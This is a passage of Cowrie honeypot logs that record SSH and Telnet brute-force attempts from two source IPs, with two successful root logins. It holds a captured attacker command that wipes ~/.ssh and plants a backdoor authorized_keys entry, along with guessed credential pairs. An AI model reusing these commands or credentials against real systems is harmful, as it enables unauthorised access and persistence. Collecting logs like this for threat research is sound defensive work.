stp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:00.075670Z","src_ip":"212.227.235.229","session":"550bd52113c7"}
{"eventid":"cowrie.login.failed","username":"ftp2","password":"111111","message":"login attempt [ftp2/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:13:00.452569Z","src_ip":"212.227.235.229","session":"550bd52113c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55605,"dst_ip":"1.2.3.4","dst_port":22,"session":"4efc520b0377","protocol":"ssh","message":"New connection: 212.227.235.229:55605 (1.2.3.4:22) [session: 4efc520b0377]","sensor":"my-vps","timestamp":"2025-09-09T02:13:01.347367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:13:01.354468Z","src_ip":"212.227.235.229","session":"4efc520b0377"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:01.544055Z","src_ip":"212.227.235.229","session":"550bd52113c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:01.599128Z","src_ip":"212.227.235.229","session":"4efc520b0377"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser1234","message":"login attempt [appuser/appuser1234] failed","sensor":"my-vps","timestamp":"2025-09-09T02:13:02.577280Z","src_ip":"212.227.235.229","session":"4efc520b0377"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:03.826524Z","src_ip":"212.227.235.229","session":"4efc520b0377"}
{"eventid":"cowrie.session.closed","duration":12.791345596313477,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:05.553182Z","src_ip":"212.227.125.160","session":"1b6dca78bbbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40822,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d67d2b9994e","protocol":"telnet","message":"New connection: 212.227.125.160:40822 (1.2.3.4:23) [session: 5d67d2b9994e]","sensor":"my-vps","timestamp":"2025-09-09T02:13:05.779599Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37166,"dst_ip":"1.2.3.4","dst_port":22,"session":"59db9be3a0a0","protocol":"ssh","message":"New connection: 212.227.235.229:37166 (1.2.3.4:22) [session: 59db9be3a0a0]","sensor":"my-vps","timestamp":"2025-09-09T02:13:06.824427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:13:06.826052Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:07.088003Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.login.success","username":"root","password":"1A2b3c4d","message":"login attempt [root/1A2b3c4d] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:13:08.134055Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:13:08.719938Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:13:08.720687Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:13:08.721861Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:08.985560Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:13:09.523385Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:13:09.524212Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:13:09.788367Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:09.789341Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38314,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cfa5917a733","protocol":"ssh","message":"New connection: 212.227.235.229:38314 (1.2.3.4:22) [session: 4cfa5917a733]","sensor":"my-vps","timestamp":"2025-09-09T02:13:10.042363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:13:10.043391Z","src_ip":"212.227.235.229","session":"4cfa5917a733"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:10.296969Z","src_ip":"212.227.235.229","session":"4cfa5917a733"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:13:11.355158Z","src_ip":"212.227.235.229","session":"4cfa5917a733"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:12.613168Z","src_ip":"212.227.235.229","session":"4cfa5917a733"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39498,"dst_ip":"1.2.3.4","dst_port":22,"session":"664e8bf68000","protocol":"ssh","message":"New connection: 212.227.235.229:39498 (1.2.3.4:22) [session: 664e8bf68000]","sensor":"my-vps","timestamp":"2025-09-09T02:13:12.968274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:13:12.969503Z","src_ip":"212.227.235.229","session":"664e8bf68000"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:13.279109Z","src_ip":"212.227.235.229","session":"664e8bf68000"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:13:14.564008Z","src_ip":"212.227.235.229","session":"664e8bf68000"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:14.828506Z","src_ip":"212.227.235.229","session":"59db9be3a0a0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:14.877447Z","src_ip":"212.227.235.229","session":"664e8bf68000"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52552,"dst_ip":"1.2.3.4","dst_port":22,"session":"a283ca36f0cc","protocol":"ssh","message":"New connection: 212.227.235.229:52552 (1.2.3.4:22) [session: a283ca36f0cc]","sensor":"my-vps","timestamp":"2025-09-09T02:13:17.063004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:13:17.064742Z","src_ip":"212.227.235.229","session":"a283ca36f0cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:17.172516Z","src_ip":"212.227.235.229","session":"a283ca36f0cc"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-09-09T02:13:17.646140Z","src_ip":"212.227.235.229","session":"a283ca36f0cc"}
{"eventid":"cowrie.session.closed","duration":12.786795377731323,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:18.566339Z","src_ip":"212.227.125.160","session":"5d67d2b9994e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:18.756667Z","src_ip":"212.227.235.229","session":"a283ca36f0cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41131,"dst_ip":"1.2.3.4","dst_port":23,"session":"e62db1d492ab","protocol":"telnet","message":"New connection: 212.227.125.160:41131 (1.2.3.4:23) [session: e62db1d492ab]","sensor":"my-vps","timestamp":"2025-09-09T02:13:18.783671Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36752,"dst_ip":"1.2.3.4","dst_port":22,"session":"b35bc1115c89","protocol":"ssh","message":"New connection: 212.227.235.229:36752 (1.2.3.4:22) [session: b35bc1115c89]","sensor":"my-vps","timestamp":"2025-09-09T02:13:20.222733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:13:20.229543Z","src_ip":"212.227.235.229","session":"b35bc1115c89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:20.621133Z","src_ip":"212.227.235.229","session":"b35bc1115c89"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"Password1","message":"login attempt [appuser/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:13:22.178143Z","src_ip":"212.227.235.229","session":"b35bc1115c89"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:23.577412Z","src_ip":"212.227.235.229","session":"b35bc1115c89"}
{"eventid":"cowrie.session.closed","duration":12.777199268341064,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:31.560802Z","src_ip":"212.227.125.160","session":"e62db1d492ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41451,"dst_ip":"1.2.3.4","dst_port":23,"session":"217114921c77","protocol":"telnet","message":"New connection: 212.227.125.160:41451 (1.2.3.4:23) [session: 217114921c77]","sensor":"my-vps","timestamp":"2025-09-09T02:13:31.762005Z"}
{"eventid":"cowrie.session.closed","duration":12.81164288520813,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:44.573547Z","src_ip":"212.227.125.160","session":"217114921c77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41743,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f233affc546","protocol":"telnet","message":"New connection: 212.227.125.160:41743 (1.2.3.4:23) [session: 9f233affc546]","sensor":"my-vps","timestamp":"2025-09-09T02:13:44.786006Z"}
{"eventid":"cowrie.session.closed","duration":12.777247667312622,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:13:57.563189Z","src_ip":"212.227.125.160","session":"9f233affc546"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42039,"dst_ip":"1.2.3.4","dst_port":23,"session":"762d73df44e9","protocol":"telnet","message":"New connection: 212.227.125.160:42039 (1.2.3.4:23) [session: 762d73df44e9]","sensor":"my-vps","timestamp":"2025-09-09T02:13:57.790638Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33876,"dst_ip":"1.2.3.4","dst_port":22,"session":"2edce4816c41","protocol":"ssh","message":"New connection: 212.227.235.229:33876 (1.2.3.4:22) [session: 2edce4816c41]","sensor":"my-vps","timestamp":"2025-09-09T02:13:59.455868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:13:59.456634Z","src_ip":"212.227.235.229","session":"2edce4816c41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:13:59.539994Z","src_ip":"212.227.235.229","session":"2edce4816c41"}
{"eventid":"cowrie.login.failed","username":"red","password":"password123","message":"login attempt [red/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:13:59.917031Z","src_ip":"212.227.235.229","session":"2edce4816c41"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:01.003015Z","src_ip":"212.227.235.229","session":"2edce4816c41"}
{"eventid":"cowrie.session.closed","duration":12.771390438079834,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:10.561960Z","src_ip":"212.227.125.160","session":"762d73df44e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42348,"dst_ip":"1.2.3.4","dst_port":23,"session":"caeb2a34323c","protocol":"telnet","message":"New connection: 212.227.125.160:42348 (1.2.3.4:23) [session: caeb2a34323c]","sensor":"my-vps","timestamp":"2025-09-09T02:14:10.763054Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40102,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe1e788324af","protocol":"ssh","message":"New connection: 212.227.235.229:40102 (1.2.3.4:22) [session: fe1e788324af]","sensor":"my-vps","timestamp":"2025-09-09T02:14:13.044480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:13.052424Z","src_ip":"212.227.235.229","session":"fe1e788324af"}
